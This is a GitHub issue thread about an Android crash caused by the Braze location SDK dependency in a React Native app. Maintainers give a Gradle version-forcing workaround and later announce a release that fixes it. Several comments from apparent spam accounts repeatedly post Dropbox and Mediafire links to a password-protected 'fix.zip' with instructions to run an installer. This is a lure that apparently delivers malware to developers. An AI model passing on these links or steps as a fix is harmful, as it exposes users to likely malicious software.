### ISSUE TITLE
[Bug]: com.braze:android-sdk-location:+ causes crash

### ISSUE THREAD

**Issue by marc-technocrat** [braze-inc/braze-react-native-sdk#264]
### Which Platforms?

Android

### Which React Native Version?

0.73.9

### Which @braze/react-native-sdk SDK version?

11.0.0

### Repro Rate

100%

### Steps To Reproduce

In app/build.gradle include
```
implementation "com.braze:android-sdk-location:+"
```
  2. Run the app.
  3. Crashes before RN is injected

### Expected Behavior

It should boot the app

### Actual Incorrect Behavior

Crashes on launch

### Additional Information

Can see that this was required for Braze Location and geofence functionality. 
https://www.braze.com/docs/developer_guide/platform_integration_guides/android/changelog/#2410
Team has steadily updated Braze.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by amitmehtacode** [comment]
you need to remove this

implementation "com.braze:android-sdk-ui:+"

**Comment by marc-technocrat** [comment]
@amitmehtacode don't have that line in our code

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marc-technocrat** [comment]
@bryanlogan Which version?
We have the 11.0.0 react native sdk

**Comment by bryanlogan** [comment]
Yes, that would be a temporary solution.

**Comment by radixdev** [comment]
Hello @marc-technocrat et al,

For each SDK wrapper, we do compatibility testing with each released version of the core native (android and iOS) Braze SDKs. You can see that version [here](https://github.com/braze-inc/braze-react-native-sdk/blob/8c42a02e3a686845ac4db85941e6c4f2a7665113/android/build.gradle#L52). Until we make an official release of the upstream wrapper (in this case React), we do not recommend using a different version of the underlying native SDK. 

However, in order to fix your crash and be able to use the location library, we recommend adding this to your **_root level_** `build.gradle` file.

```gradle
allprojects {
    configurations.all {
        resolutionStrategy {
            force 'com.braze:android-sdk-ui:+'
        }
    }
}
```

The cause of the crash is that our wrapper dependency is compiled against a different version than the latest, which is what the `+` in `implementation "com.braze:android-sdk-location:+"` is doing. This fix is merely telling Gradle that all transitive dependencies of your app should be using the same version, which is your case would be `"com.braze:android-sdk-location:+"`. Our location SDK pulls in `com.braze:android-sdk-ui` as a dependency.

Please let us know if this fixes your issue,
Julian

**Comment by marc-technocrat** [comment]
@radixdev 
Going forward is the intention to no longer require "com.braze:android-sdk-location:+"? If not it should be. The sdk should fully manage the native dependencies.
This a pretty poor experience to have the libraries randomly crash one day when you guys push an update. It's not a proper react-native-sdk when native dependency management is required and unreliable.

**Comment by radixdev** [comment]
Hi @marc-technocrat ,

That's excellent feedback and I've taken it to the team for review. I'll update this issue once we have more details/release date.

**Comment by jerielng** [comment]
Hey @marc-technocrat, we've just released version 12.2.0 which adds some safeguards around it. You can now let the Braze SDK conditionally import the precise version of `com.braze:android-sdk-location` by setting `importBrazeLocationLibrary=true` in your `gradle.properties`, so there is no need to include this explicitly in your `build.gradle` any longer.

I'll close out this issue but please reach back out if you have other questions. Thanks!
